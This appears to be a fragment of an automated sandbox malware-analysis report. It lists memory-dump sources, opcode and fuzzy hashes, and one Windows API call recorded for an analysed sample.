                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction ID: 678eaee0e22883ac7a801a5a92a95a4c58884562fe07dcc7c3908c64aa7d63e3
                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction Fuzzy Hash: 5AD0A7B1948BB10E57588D3804E04B7FBE8EA47613B18159FE4D2E7205D224DC41469C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                    • Instruction ID: 776a1f7dd0c074e79f55533e911544892ec85f46c384d1e8a4e462c15b4e92e9
                                                    • Opcode Fuzzy Hash: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                    • Instruction Fuzzy Hash: 97D022B86481003B0248CB09CC4AE33B77CC387200F002034BE05C3350C610EC2182EE
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: 0=$0=$ER$P&
                                                    • API String ID: 237503144-76498936
                                                    • Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                    • Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
                                                    • Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                    • Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84